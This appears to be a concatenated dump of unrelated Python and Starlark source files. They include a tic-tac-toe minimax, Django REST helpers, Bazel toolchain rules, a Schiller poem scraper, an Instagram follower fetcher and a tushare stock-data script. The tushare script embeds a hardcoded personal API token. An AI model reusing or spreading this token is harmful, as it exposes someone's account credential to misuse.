y)\nsum(y_res==1)\nsum(y==1)\nX_res=pd.DataFrame(X_res)\ny_res=pd.DataFrame(y_res)\nop=pd.concat([X_res.reset_index(drop=True),y_res],axis=1)\nop.to_csv(\"train_with_smote31.csv\",index=True)","sub_path":"ClassImbalance_SMOTE.py","file_name":"ClassImbalance_SMOTE.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"11129568","text":"\"\"\" The implementation of the interface for Connectome File Metadata \"\"\"\n# Copyright (C) 2009-2010, Ecole Polytechnique Federale de Lausanne (EPFL) and\n# University Hospital Center and University of Lausanne (UNIL-CHUV)\n#\n# Modified BSD License\n\n# Enthought library imports\nfrom enthought.traits.api import HasTraits, Str, implements, Int, Button\nfrom enthought.traits.ui.api import View, Item, Group, spring\n\n# ConnectomeViewer import\nfrom interfaces.i_meta import IMeta\n\n# Logging import\nimport logging\nlogger = logging.getLogger('root.'+__name__)\n\nclass Meta(HasTraits):\n \"\"\" The implementation for Connectome File Metadata. \"\"\"\n\n implements(IMeta)\n\n # Connectome File Format Version\n version = Str\n \n # Generator\n generator = Str\n \n # Initial creator\n initial_creator = Str\n \n # Creation date\n creation_date = Str\n \n # Modification Date\n modification_date = Str\n \n # the name of the cfile\n name = Str\n \n # Data about which species\n species = Str\n \n # Legal notice\n legal_notice = Str\n \n # A reference, e.g. where the data was used\n reference = Str\n \n # URL with more information or data source\n url = Str\n \n # Description of the content of the File\n description = Str\n \n # Nr of networks contained in this File\n nr_of_networks = Int\n \n # helper button\n openurl = Button\n \n # Group\n infogroup = Group(\n Item( 'generator', style = 'readonly', label = 'Generator:'),\n Item( 'name', style = 'readonly', label = 'Short Name:'),\n Item( 'initial_creator', style = 'readonly', label = 'Initial Creator:'),\n Item( 'creation_date', style = 'readonly', label = 'Creation Date'),\n Item( 'modification_date', style = 'readonly', label = 'Modification Date'),\n Item( '_'),\n Item( 'species', style = 'readonly', label = 'Species:'),\n #Item( 'useatlas', style = 'readonly', label = 'Use Atlas:'),\n Item( 'legal_notice', style = 'readonly', label = 'Legal Notice:'),\n Item( 'reference', style = 'readonly', label = 'References:'),\n Item( 'url', style = 'readonly', label = 'URL:'),\n Item( name = 'openurl', label = 'Open URL ...', show_label = False, visible_when = \"url != ''\"),\n spring,\n Item( 'description', style = 'custom', show_label=False, springy=True,\\\n tooltip='The description of the content of this Connectome File'),\n )\n \n traits_view = View(\n infogroup,\n title = 'Connectome File: Metadata',\n width = 500,\n height = 450,\n resizable = True,\n buttons = ['OK', ]\n )\n\n def __init__(self, filestring = None):\n \"\"\" Parses the file given as a xml string\n \n \"\"\"\n if not filestring is None:\n # invoke the parser\n self.parse_meta_xml(filestring)\n\n def _openurl_changed(self):\n \"\"\" Button was clicked \"\"\"\n from cviewer.action.help import browser_open\n browser_open(url=self.url, decorated = True)\n\n\n def parse_meta_xml(self, filestring):\n \"\"\" Parses the given file and returns True if all Traits are set.\n\n Parameters\n ----------\n filestring: StringIO\n String object to parse metadata\n\n \"\"\"\n from lxml import etree\n tree = etree.fromstring(filestring)\n \n # first child, loop through the meta-info\n nsprefix = \"{%s}\" % tree.nsmap[None]\n \n # Parse the KEYs\n for child in tree.iterchildren():\n if child.tag == (nsprefix+'viewer-meta'):\n self.version = child.attrib['version']\n for mchildren in child.iterchildren():\n if mchildren.tag == (nsprefix + 'generator'):\n if not mchildren.text is None:\n self.generator = mchildren.text\n elif mchildren.tag == (nsprefix + 'initial-creator'):\n if not mchildren.text is None:\n self.initial_creator = mchildren.text\n elif mchildren.tag == (nsprefix + 'creation-date'):\n if not mchildren.text is None:\n self.creation_date = mchildren.text\n elif mchildren.tag == (nsprefix + 'modification-date'):\n if not mchildren.text is None:\n self.modification_date = mchildren.text\n elif mchildren.tag == (nsprefix + 'name'):\n if not mchildren.text is None:\n self.name = mchildren.text\n elif mchildren.tag == (nsprefix + 'species'):\n if not mchildren.text is None:\n self.species = mchildren.text\n elif mchildren.tag == (nsprefix + 'legal-notice'):\n if not mchildren.text is None:\n self.legal_notice = mchildren.text\n elif mchildren.tag == (nsprefix + 'references'):\n if not mchildren.text is None:\n self.reference = mchildren.text\n elif mchildren.tag == (nsprefix + 'url'):\n if not mchildren.text is None:\n self.url = mchildren.text\n elif mchildren.tag == (nsprefix + 'description'):\n if not mchildren.text is None:\n self.description = mchildren.text\n elif mchildren.tag == (nsprefix + 'nr_of_networks'):\n if not mchildren.text is None:\n self.nr_of_networks = int(mchildren.text)\n else:\n logger.info('Tag '+ mchildren.tag + ' not found in meta.xml')\n \n#############","sub_path":"cviewer/plugins/cff/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"126529847","text":"import string\nimport random\n\nfrom WordDB import WordDB\nfrom DBObject import DBObject\n\nclass User(DBObject):\n table = 'user'\n fields = { \"id\": {\n \"name\": \"id\",\n \"type\": \"int\",\n },\n \"name\": {\n \"name\": \"name\",\n \"type\": \"string\",\n },\n \"username\": {\n \"name\": \"username\",\n \"type\": \"string\",\n },\n } \n\n def __init__(self, wdb):\n DBObject.__init__(self, wdb)\n\nif __name__ == \"__main__\":\n name = ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(10))\n username = ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(10))\n wdb = WordDB()\n u = User(wdb)\n u[\"name\"] = name\n u[\"username\"] = username\n\n","sub_path":"models/User.py","file_name":"User.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"506584768","text":"import random\n\nN = 1000000\nM = 500000\nr = 1\n\nwith open(\"in.txt\", \"w\") as f:\n f.write(\"{}\\n\".format(N))\n for i in range(N): f.write(\"{} \".format(10000000))\n f.write(\"\\n\")\n\n\n","sub_path":"CodeForces/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"492465746","text":"import numpy as np\nimport math\nimport os\n\nai, human = 'X', 'O'\n\ndef clear():\n os.system('cls')\n\ndef check_winner(board):\n rows, cols = np.shape(board)\n cond_1 = np.hsplit(board, 3)\n cond_2 = np.vsplit(board, 3)\n\n board_flip = np.fliplr(board)\n x_case = np.where(board.diagonal() == 'X', True, False)\n x_case_f = np.where(board_flip.diagonal() == 'X', True, False)\n o_case = np.where(board.diagonal() == 'O', True, False)\n o_case_f = np.where(board_flip.diagonal() == 'O', True, False)\n\n if x_case.all() or x_case_f.all():\n return 'X'\n elif o_case.all() or o_case_f.all():\n return 'O'\n\n for elem in cond_1:\n caseX = np.where(elem == 'X', True, False)\n caseO = np.where(elem == 'O', True, False)\n if caseX.all():\n return 'X'\n elif caseO.all():\n return 'O'\n for elem in cond_2:\n caseX = np.where(elem == 'X', True, False)\n caseO = np.where(elem == 'O', True, False)\n if caseX.all():\n return 'X'\n elif caseO.all():\n return 'O'\n\n if np.where(board != '', True, False).all():\n return 'tie'\n\ndef best_move(board):\n pos = np.argwhere(board.__eq__('') == True)\n move = []\n best_score = -math.inf\n for values in pos:\n x, y = values\n board[x, y] = ai\n score = min_value(board, 0)\n board[x, y] = ''\n if score > best_score:\n best_score = score\n move = [x, y]\n\n board[move[0], move[1]] = ai\n print_board(board)\n make_move(board)\n\n\ndef min_value(board, depth):\n\n if check_winner(board) == human:\n return -10\n elif check_winner(board) == ai:\n return 10\n elif check_winner(board) == 'tie':\n return 0\n pos = np.argwhere(board.__eq__('') == True)\n\n best_score = math.inf\n for values in pos:\n x, y = values\n board[x, y] = human\n score = max_value(board, depth+1)\n board[x, y] = ''\n best_score = min(score, best_score)\n return best_score\n\ndef max_value(board, depth):\n if check_winner(board) == human:\n return -10\n elif check_winner(board) == ai:\n return 10\n elif check_winner(board) == 'tie':\n return 0\n\n pos = np.argwhere(board.__eq__('') == True)\n best_score = -math.inf\n for values in pos:\n x, y = values\n board[x, y] = ai\n score = min_value(board, depth+1)\n board[x, y] = ''\n best_score = max(best_score, score)\n\n return best_score\n\ndef make_move(board):\n current_move = human\n if check_winner(board) == ai:\n print(\"Ai won the game\")\n elif check_winner(board) == 'tie':\n print('It is a tie')\n elif current_move == human:\n x = int(input(\"Please enter X co-ordinate: \"))\n y = int(input(\"Please enter Y co-ordinate: \"))\n try:\n if board[x, y] == '':\n board[x, y] = human\n if check_winner(board) == human:\n print(\"Congratulations you won the game\")\n elif check_winner(board) == 'tie':\n print_board(board)\n print(\"It's a tie\")\n else:\n best_move(board)\n else:\n print(\"Position is already occupied, Please enter new pos:\")\n make_move(board)\n except:\n print(\"Invalid Position. Please enter again:\")\n make_move(board)\n\ndef print_board(board):\n clear()\n for index, elems in enumerate(board):\n for idx, val in enumerate(elems):\n if idx != 2:\n print('', val, ' | ', end='')\n else:\n print(val)\n if index != 2:\n print('-------------')\n\n\nif __name__ == '__main__':\n board = np.full((3, 3), '', dtype=str)\n print_board(board)\n make_move(board)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"258337749","text":"from flask_sqlalchemy import SQLAlchemy\nfrom app import db\n\n\nclass Review(db.Model):\n id = db.Column(db.Integer,primary_key=True)\n text = db.Column(db.String(400))\n item_id=db.Column(db.Integer)\n user=db.Column(db.String(40))\n def __init__(self,text,item_id,username):\n self.text = text\n self.item_id=item_id\n self.user=username\n def revSerialize(self):\n return { \"item_id\":self.item_id,\"Review\": self.text,\"user\": self.user }\n","sub_path":"app/reviews/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"2752322","text":"# -*- encoding:utf-8 -*-\nfrom mako import runtime, filters, cache\nUNDEFINED = runtime.UNDEFINED\n__M_dict_builtin = dict\n__M_locals_builtin = locals\n_magic_number = 9\n_modified_time = 1386266502.119802\n_enable_loop = True\n_template_filename = u'/Users/xochilpili/Documents/Develop/python/pylons/DanieleChallenge/danielechallenge/templates/base/base.html'\n_template_uri = u'/base/base.html'\n_source_encoding = 'utf-8'\nfrom markupsafe import escape\n_exports = []\n\n\ndef render_body(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n next = context.get('next', UNDEFINED)\n __M_writer = context.writer()\n # SOURCE LINE 1\n __M_writer(u'\\n\\nFormDemo\\n\\n\\n')\n # SOURCE LINE 6\n __M_writer(escape(next.body()))\n __M_writer(u'\\n\\n\\n\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n","sub_path":"data/templates/base/base.html.py","file_name":"base.html.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"254825597","text":"import os\nimport re\n\n__author__ = 'Dean Gardiner'\n\n\ndef get_text(filename):\n if not os.path.exists(filename):\n return \"\"\n _file = open(filename)\n data = _file.read()\n _file.close()\n return data\n\n\ndef parse_data(data):\n items = []\n li = 0\n for line in data.splitlines():\n li += 1\n line = line.decode('utf-8')\n\n tvdb_id, sep, aliases = line.partition(':')\n\n alias_list = [re.sub(r'\\\\(.)', r'\\1', x) for x in re.findall(r\"'(.*?)(?//:toolchain\"\n - A compiler target: \"@//:compiler\"\n - A platform: \"@//:platform\"\n - An execution platform: \"@//:execution_platform\"\n - A config setting: \"@//:target\"\n\"\"\"\n\ndef toolchain_maker(name, implementation, definition):\n if implementation == \"linux_gcc\":\n updated_definition = toolchain_merge({\n \"compile_dev_flags\": COPTS_GCC_DEV,\n \"compile_prod_flags\": COPTS_GCC_PROD,\n \"compile_flags\": COPTS_GCC,\n \"link_flags\": LINKOPTS_GCC,\n \"coverage_compile_flags\": COPTS_GCC_COVERAGE,\n \"coverage_link_flags\": LINKOPTS_GCC_COVERAGE,\n \"template_bin_cc\": \"//tools/bazel_build/toolchains/cc:template/bin/wrapper_cc_start_end_group\",\n }, definition)\n\n _toolchain_maker_linux(\n name = name,\n **updated_definition\n )\n\n elif implementation == \"linux_clang\":\n updated_definition = toolchain_merge({\n \"compile_dev_flags\": COPTS_CLANG_DEV,\n \"compile_prod_flags\": COPTS_CLANG_PROD,\n \"compile_flags\": COPTS_CLANG,\n \"link_flags\": LINKOPTS_CLANG,\n \"coverage_compile_flags\": COPTS_CLANG_COVERAGE,\n \"coverage_link_flags\": LINKOPTS_CLANG_COVERAGE,\n }, definition)\n\n _toolchain_maker_linux(\n name = name,\n **updated_definition\n )\n\n else:\n fail(\"Unsupported toolchain type '{}'\".format(implementation))\n\n native.register_toolchains(\n \"@{}//:toolchain\".format(name),\n \"@{}//:binary_toolchain\".format(name),\n )\n\ndef toolchain_merge(data1, data2):\n \"\"\"Merge 2 toolchain data entries.\"\"\"\n\n # Make a copy of data1 so that it can be mutated\n result = {}\n result.update(data1)\n\n # Populate the data2 items\n for key2, value2 in data2.items():\n if key2 in data1:\n if type(data1[key2]) != type(value2):\n fail(\"Trying to merge conflicting types for key '{}'.\".format(key2))\n if type(value2) == \"list\":\n result[key2] = data1[key2] + value2\n elif data1[key2] != value2:\n fail(\"Trying to merge different values for key '{}'.\".format(key2))\n else:\n result[key2] = value2\n\n return result\n","sub_path":"tools/bazel_build/toolchains/cc/defs.bzl","file_name":"defs.bzl","file_ext":"bzl","file_size_in_byte":10757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"213952760","text":"# Import all the necessary libraries\n\nimport os\nimport sys\n\nfrom bs4 import BeautifulSoup\nfrom urllib.request import Request, urlopen\n\n# Unter dem folgenden Link (base) finden sich alle Gedichte von Friedrich Schiller auf gutenberg.spiegel.de\n# die einzelnen Ausgaben werden dahinter einfach hochgezählt (max 154)\n# mit folgendem Script könnten die Gedichte heruntergeladen und in eine Textdatei abgespeichert werden.\n# \n\n\nbase = 'http://gutenberg.spiegel.de/buch/gedichte-9097/'\n\nfor n in range(41, 156):\n print(n)\n url = base + str(n)\n req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})\n url = urlopen(req)\n content = url.read()\n soup = BeautifulSoup(content, 'lxml')\n \n text = ''\n \n div = soup.findAll(\"div\",{\"id\" : \"gutenb\"})\n for tag in div:\n t = tag.get_text()\n text += t\n\n tempfile = 'temp.txt'\n \n with open(tempfile, 'w') as temp:\n temp.write(text)\n\n # open the textfile\n with open(tempfile, 'r') as f:\n text_lines = f.readlines()\n f.close()\n \n # get the title of the poem\n title = text_lines[1]\n \n # folgendes ist notwendig, damit der new line character nicht im \n # titel erscheint. \n title = title[:-2]\n print(title)\n #write the poem into its own textfile\n with open('./input/txt/to_process/' + str(title) + '.txt', 'w') as pfile:\n pfile.write(text)\n \n\n ## Try to delete the temp file ##\n try:\n os.remove(tempfile)\n except OSError as e: ## if failed, report it back to the user ##\n print (\"Error: %s - %s.\" % (e.filename, e.strerror))\n \n \n\n","sub_path":"helper/gutenberg_down.py","file_name":"gutenberg_down.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"402911518","text":"import base64\nimport datetime\nimport decimal\nimport os\nimport random\nimport string\nimport uuid\n\nfrom django.conf import settings\nfrom django.contrib.auth.views import redirect_to_login\nfrom django.core.exceptions import PermissionDenied\nfrom django.core.files.base import ContentFile\nfrom django.db import IntegrityError\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.utils import timezone, six\nfrom django.utils.dateparse import parse_datetime\nfrom django.utils.timezone import is_aware, make_aware\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import DjangoModelPermissions\nfrom django_filters.filters import EMPTY_VALUES, OrderingFilter\nfrom rest_framework import status, serializers\nfrom rest_framework.pagination import PageNumberPagination, _positive_int\n\n\nfrom django.contrib.auth.mixins import PermissionRequiredMixin as \\\n DjangoPermissionRequiredMixin\n\n\nclass PermissionRequiredMixin(DjangoPermissionRequiredMixin):\n\n def get_permission_required(self):\n perms = self.permission_required or ()\n if isinstance(perms, dict):\n perms = perms.get(self.request.method.lower(), ()) or ()\n\n if isinstance(perms, six.string_types):\n perms = (perms, )\n\n return perms\n\n def handle_no_authenticated(self):\n if self.request.is_ajax():\n return JsonResponse({'error': 'Not Authorized'}, status=401)\n return redirect_to_login(self.request.get_full_path(),\n self.get_login_url(),\n self.get_redirect_field_name())\n\n def handle_no_permission(self):\n if self.request.is_ajax():\n return JsonResponse({'error': 'Permission Denied'}, status=403)\n if self.raise_exception:\n raise PermissionDenied(self.get_permission_denied_message())\n return render(self.request, \"no-permission.html\", status=403)\n\n def dispatch(self, request, *args, **kwargs):\n if not request.user.is_authenticated:\n return self.handle_no_authenticated()\n if not self.has_permission():\n return self.handle_no_permission()\n return super(PermissionRequiredMixin, self\n ).dispatch(request, *args, **kwargs)\n\n\ndef to_dict(obj, fields=None, fields_map=None, extra_fields=None):\n \"\"\"\n convert a model object to a python dict.\n @param fields: list of fields which we want to show in return value.\n if fields=None, we show all fields of model object\n @type fields: list\n @param fields_map: a map converter to show fields as a favorite.\n every field can bind to a lambda function in fields_map.\n if a field was bind to a None value in fields_map, we ignore this field\n to show in result\n @type fields_map: dict\n \"\"\"\n data = {}\n fields_map = fields_map or {}\n\n if fields is None:\n fields = [f.name for f in obj.__class__._meta.fields]\n fields.extend(extra_fields or [])\n for field in fields:\n if field in fields_map:\n if fields_map[field] is None:\n continue\n v = fields_map.get(field)()\n else:\n v = getattr(obj, field, None)\n if isinstance(v, datetime.datetime):\n data[field] = v.isoformat() + 'Z'\n elif isinstance(v, datetime.date):\n data[field] = v.isoformat()\n elif isinstance(v, decimal.Decimal):\n data[field] = float(v)\n else:\n data[field] = v\n\n return data\n\n\nclass CustomPagination(PageNumberPagination):\n \"\"\" Custom Pagination to be used in rest api\"\"\"\n\n BIG_PAGE_SIZE = 10000000\n page_size_query_param = 'page_size'\n\n def paginate_queryset(self, queryset, request, view=None):\n if view:\n max_page_size = getattr(view, 'max_page_size', self.max_page_size)\n if max_page_size is None:\n from django.conf import settings\n max_page_size = settings.REST_FRAMEWORK.get('MAX_PAGE_SIZE_DEFAULT', 100)\n self.max_page_size = self.BIG_PAGE_SIZE if max_page_size == 0 else max_page_size\n return super(CustomPagination, self).paginate_queryset(queryset, request, view=view)\n\n def get_page_size(self, request):\n \"\"\"\n this is overrided to allow 0 as a page_size.\n if page_size=0, we will set page_size as max_page_size.\n \"\"\"\n page_size = self.page_size\n if self.page_size_query_param:\n try:\n page_size = _positive_int(\n request.query_params[self.page_size_query_param],\n strict=False,\n cutoff=self.max_page_size\n )\n except (KeyError, ValueError):\n pass\n if page_size == 0:\n page_size = self.max_page_size\n return page_size\n\n def get_paginated_response(self, data):\n \"\"\" override pagination structure in list rest api \"\"\"\n\n next_page = self.page.next_page_number() if \\\n self.page.has_next() else None\n previous_page = self.page.previous_page_number() if \\\n self.page.has_previous() else None\n return Response({\n 'pagination': {\n 'next_url': self.get_next_link(),\n 'previous_url': self.get_previous_link(),\n 'current_page': self.page.number,\n 'next_page': next_page,\n 'previous_page': previous_page,\n 'first_page': 1,\n 'last_page': self.page.paginator.num_pages,\n 'page_size': self.get_page_size(self.request),\n 'count': self.page.paginator.count,\n },\n 'results': data\n })\n\n\ndef custom_rest_exception_handler(exc, context):\n \"\"\" Custom rest api exception handler \"\"\"\n from rest_framework import exceptions\n from rest_framework.compat import set_rollback\n from rest_framework.views import exception_handler\n response = exception_handler(exc, context)\n if isinstance(exc, IntegrityError) and ('already exists' in str(exc) or 'must make a unique set' in str(exc)):\n data = {'detail': 'duplicate unique key'}\n set_rollback()\n return Response(data, status=status.HTTP_409_CONFLICT)\n if isinstance(exc, exceptions.NotAuthenticated):\n response.status_code = status.HTTP_401_UNAUTHORIZED\n if isinstance(exc, exceptions.ValidationError) and (\n 'already exists' in str(exc) or 'must make a unique set' in str(exc)):\n response.status_code = status.HTTP_409_CONFLICT\n\n return response\n\n\nclass DynamicFieldsSerializerMixin(object):\n \"\"\"\n This class allow you to have dynamic fields in get rest api.\n user can pass \"fields\" and \"xfields\" as a get query parameter.\n \"fields\" specify list of fields you want to be shown as a result.\n \"xfields\" specify list of fields you want to be excluded in result.\n i.e:\n fields=id,name\n or\n xfields=name1,name2\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(DynamicFieldsSerializerMixin, self).__init__(*args, **kwargs)\n if not self.context:\n return\n\n params = self.context['request'].query_params\n fields = params.get('fields')\n xfields = params.get('xfields')\n if fields:\n fields = fields.split(',')\n allowed = set(fields)\n existing = set(self.fields.keys())\n for field_name in existing - allowed:\n self.fields.pop(field_name)\n elif xfields:\n xfields = xfields.split(',')\n for field_name in xfields:\n self.fields.pop(field_name, None)\n\n\nclass ExtendedOrderingFilter(OrderingFilter):\n def __init__(self, *args, **kwargs):\n self.ordering_map = kwargs.pop('ordering_map', {})\n super(ExtendedOrderingFilter, self).__init__(*args, **kwargs)\n\n def get_ordering_value(self, param):\n descending = param.startswith('-')\n param = param[1:] if descending else param\n field_name = self.param_map.get(param, param)\n field_name = self.ordering_map.get(field_name, field_name)\n if isinstance(field_name, str):\n field_name = (field_name,)\n\n return [(\"-%s\" % f if descending else f) for f in field_name ]\n\n def filter(self, qs, value):\n if value in EMPTY_VALUES:\n return qs\n\n ordering = []\n for param in value:\n ordering.extend(list(self.get_ordering_value(param)))\n return qs.order_by(*ordering)\n\n\nclass CustomDjangoModelPermissions(DjangoModelPermissions):\n perms_map = {\n 'OPTIONS': [],\n 'HEAD': [],\n 'GET': ['%(app_label)s.view_%(model_name)s'],\n 'POST': ['%(app_label)s.add_%(model_name)s'],\n 'PUT': ['%(app_label)s.change_%(model_name)s'],\n 'PATCH': ['%(app_label)s.change_%(model_name)s'],\n 'DELETE': ['%(app_label)s.delete_%(model_name)s'],\n }\n\n\ndef random_id(n=8, no_upper=False, no_lower=False, no_digit=False):\n rand = random.SystemRandom()\n chars = ''\n if no_upper is False:\n chars += string.ascii_uppercase\n if no_lower is False:\n chars += string.ascii_lowercase\n if no_digit is False:\n chars += string.digits\n if not chars:\n raise Exception('chars is empty! change function args!')\n return ''.join([rand.choice(chars) for _ in range(n)])\n\n\ndef get_random_upload_path(upload_dir, filename, include_date=False):\n ext = filename.split('.')[-1]\n randid = random_id(n=8)\n filename = \"{0}-{1}.{2}\".format(uuid.uuid4(), randid, ext)\n if include_date:\n filename = '{}-{}'.format(timezone.now().strftime('%Y%m%d%H%M%S'), filename)\n return os.path.join(upload_dir, filename)\n\n\nclass Base64ImageField(serializers.ImageField):\n def to_internal_value(self, data):\n data = data.read().decode()\n if data.startswith('data:image'):\n format, imgstr = data.split(';base64,') # format ~= data:image/X,\n ext = format.split('/')[-1] # guess file extension\n id = uuid.uuid4()\n data = ContentFile(base64.b64decode(imgstr), name = id.urn[9:] + '.' + ext)\n return super(Base64ImageField, self).to_internal_value(data)\n\n\ndef get_aware_datetime(date_str):\n ret = parse_datetime(date_str)\n if not is_aware(ret):\n ret = make_aware(ret)\n return ret\n\n\ndef ex_reverse(viewname, **kwargs):\n if viewname.startswith('http://') or viewname.startswith('https://'):\n return viewname\n\n host = kwargs.pop('hostname', None)\n request = kwargs.pop('request', None)\n scheme = kwargs.pop('scheme', None)\n if not host:\n host = request.get_host() if request else settings.HOSTNAME\n\n if not viewname:\n rel_path = ''\n elif viewname.startswith('/'):\n rel_path = viewname\n else:\n rel_path = reverse(viewname, **kwargs)\n\n scheme = '{}://'.format(scheme) if scheme else ''\n\n return '{0}{1}{2}'.format(scheme, host, rel_path)\n","sub_path":"project/helpers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"125635453","text":"from InstagramAPI import InstagramAPI\nimport sys\nsys.path.insert(0, '/home/pi/develop/instabot.py/instabot_py/models')\nfrom followers_model import FollowersModel\nimport constantRaspbian\n\ndef getTotalFollowers(api, user_id):\n followers = []\n next_max_id = True\n while next_max_id:\n # first iteration hack\n if next_max_id is True:\n next_max_id = ''\n\n _ = api.getUserFollowers(user_id, maxid=next_max_id)\n followers.extend(api.LastJson.get('users', []))\n next_max_id = api.LastJson.get('next_max_id', '')\n return followers\n\nfollowers_model = FollowersModel();\nInstagramAPI = InstagramAPI(constantRaspbian.LOGIN, constantRaspbian.PASS)\nInstagramAPI.login()\nuser_id = InstagramAPI.username_id\nfollowers = getTotalFollowers(InstagramAPI, user_id)\nfollowers_model.setAllInactive()\nnew = 0\nfor item in followers:\n new += followers_model.save(item['pk'], item['username'])\nprint (\"New followers: {}\".format(new))\n","sub_path":"instabot_py/api/followers.py","file_name":"followers.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"83583563","text":"import tushare as ts\nimport pandas as pd\n\nts.set_token('87109caa5d7d9197ce7c5d2cd687bf6d8f1fef7f98042675c147012b') # 新版tushare需要个人token\npro = ts.pro_api()\n\n# \n\n# 获取股票基本信息:TS代码 股票代码 股票名称 行业..\n# 概念无权限获取\n# %%\nstock_basic = pro.stock_basic(list_status='L', fields='ts_code, symbol, name, industry,market')\n# 重命名行,便于后面导入neo4j\nbasic_rename = {'ts_code': 'TS代码', 'symbol': '股票代码', 'name': '股票名称', 'industry': '行业','market':'市场类型'}\nstock_basic.rename(columns=basic_rename, inplace=True)\n\n# 保存为stock_basic.csv\nstock_basic.to_csv('test\\\\stock_basic.csv', encoding='gbk')\nstock_basic.head()\n# %%\n\n# 获取上市公司法人信息及城市信息:年龄信息等tushare暂时权限不够\n# %%n\nexecutive = pro.stock_company(exchange='', fields='ts_code,chairman,manager,secretary,city')\nexecutive_rename = {'ts_code':'TS代码','chairman':'法人代表','manager':'总经理','secretary':'董秘','city':'城市'}\nexecutive.rename(columns = executive_rename,inplace=True)\n\n# 保存为executive.csv\nexecutive.to_csv('test\\\\executive.csv', encoding='gbk')\nexecutive.head()\n# %%\n\n# for i in executive.values:\n# print(i[0])","sub_path":"CodeHub/kg-0.2/Get_Data.py","file_name":"Get_Data.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"485008444","text":"# ------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------\n# --- TxOp Schedule Viewer for Link Manager Algorithm Evaluator ---\n# --- ---\n# --- Last Updated: September 3, 2019 ---\n# ------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------\n\nimport sys\nimport os\nimport argparse\nfrom lxml import etree\nimport json\nimport math\nimport operator\nimport curses\nimport copy\nimport time\nfrom curses import wrapper\n\nns = {\"xsd\": \"http://www.w3.org/2001/XMLSchema\",\n \"mdl\": \"http://www.wsmr.army.mil/RCC/schemas/MDL\",\n \"tmatsP\": \"http://www.wsmr.army.mil/RCC/schemas/TMATS/TmatsPGroup\",\n \"tmatsD\": \"http://www.wsmr.army.mil/RCC/schemas/TMATS/TmatsDGroup\"}\n\n\n# shortcut dictionary for passing common arguments\nn = {\"namespaces\": ns}\n\nMAX_BW_MBPS = 10.0 # Max data rate (Mbps)\ndebug = 0 # Debug value: initially 0, e.g. no debug\n# ------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------\n\n\nclass RanConfig:\n \"\"\"Class to contain RAN Configuration info\"\"\"\n \n def __init__(self, name, id_attr, freq=0, epoch_ms=0, guard_ms=0.0):\n self.name = name\n self.id = id_attr\n self.freq = freq\n self.epoch_ms = epoch_ms\n self.guard_ms = guard_ms\n self.links = []\n self.efficiency_pct = 0\n self.gb_violated = False\n\n def add_link(self, link):\n self.links.append(link)\n \n def check_guardbands(self):\n txop_list = []\n for l in self.links:\n for t in l.tx_sched:\n start_stop = {'start': int(t.start_usec), 'stop': int(t.stop_usec)}\n txop_list.append(start_stop)\n txop_list.sort(key=operator.itemgetter('start'))\n for i in range(len(txop_list) - 1):\n if int(txop_list[i+1]['start']) < (int(txop_list[i]['stop']) + 1 + (self.guard_ms * 1000)):\n self.gb_violated = True\n if debug >= 2:\n print(\"GUARDBAND VIOLATION DETECTED!!! {} {}\\r\".format(txop_list[i], txop_list[i+1]))\n\n\n# ------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------\n\n\nclass QoSPolicy:\n \"\"\"Class to contain QoSPolicy info\"\"\"\n \n def __init__(self, name, id_attr, lmmc=0, ac=0, lmax=1000000):\n self.name = name\n self.id = id_attr\n self.lmmc = lmmc\n self.ac = ac\n self.max_latency_usec = lmax\n\n\n# ------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------\n\n\nclass TxOp:\n \"\"\"Class to contain TxOp info\"\"\"\n \n def __init__(self, freq=0, start_usec=0, stop_usec=0, timeout=0):\n self.freq = freq\n self.start_usec = int(start_usec)\n self.stop_usec = int(stop_usec)\n self.timeout = timeout\n self.duration_usec = int(stop_usec) - int(start_usec) + 1\n\n# # ------------------------------------------------------------------------------\n# # ------------------------------------------------------------------------------\n# class Scoring_Data\n# def __init__(self):\n\n# ------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------\n\n\nclass RadioLink:\n \"\"\"Class to contain Radio Link info\"\"\"\n \n # def __init__(self, name, id_attr, src, src_id, dst, dst_id, qp=None, lat=0):\n def __init__(self, name, id_attr, src, src_id, src_group, dst, dst_id, qp=None, lat=0):\n self.name = name\n self.id = 